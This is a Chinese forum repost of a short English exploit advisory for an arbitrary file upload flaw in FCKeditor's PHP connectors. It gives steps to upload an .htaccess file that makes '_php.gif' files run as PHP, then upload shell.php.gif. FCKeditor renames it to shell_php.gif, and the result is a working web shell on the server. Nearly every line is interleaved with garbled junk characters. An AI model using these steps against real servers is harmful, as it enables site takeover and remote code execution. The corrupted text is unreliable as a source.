FCKeditor所有php版本Upload上传漏洞
( L% t" u6 K- N作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07) h, x; x* t$ d ?- J
减小字体 增大字体
3 p- H3 V- u; X. v% l[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability T8 u; l0 U; s2 T
[+] Date: 2011
+ H0 a! p% f' |; J[+] Author : sinesafe.cn* s" {! I1 Q1 Z
[+] Website : WwW.sinesafe.cn
! y* J* m% ]# _7 |. H$ d0 e———————————————————
9 y8 L, H/ s4 ?1.create a htaccess file:
8 @3 {- O! @! p# O# t9 Rcode:* k6 o6 Z c8 m. w& ~
<FilesMatch “_php.gif”>! E6 x3 ]: E( j& g3 f
SetHandler application/x-httpd-php
& y% i5 E+ S) w: u3 F- \! H. [7 c- b+ k</FilesMatch>
2 J e/ N5 |5 d1 d2 i6 C' x4 B) E- [, i$ C6 o% y& p( _
2.Now upload this htaccess with FCKeditor.
7 J4 y6 Q2 m5 k7 t6 B$ M* X u3 n
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html* q8 ^; G; F4 C- N; S
( h: Q! I! d0 s6 k/ o- qhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
/ ~! f! W6 N" `" H" {0 M
2 G! R7 B1 n' R6 |/ k———————————————————————————————-
9 U R1 f# ?0 \) h4 B; P, u' a C0 C3.Now upload shell.php.gif with FCKeditor.
& X" n" m# H2 o! Q4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.* F1 @: |3 i# `3 e9 Z
5.http://www.sinesafe.cn/anything/shell_php.gif0 T- p( C+ Q7 W& u9 ]
6.Now shell is available from server. |
/ W; B/ F& L) l4 W
6 o" u' ^/ q! h6 e: V8 A
/ L) `3 W! H" i. ` |
发表于 2013-10-27 17:25:21
收藏
支持
反对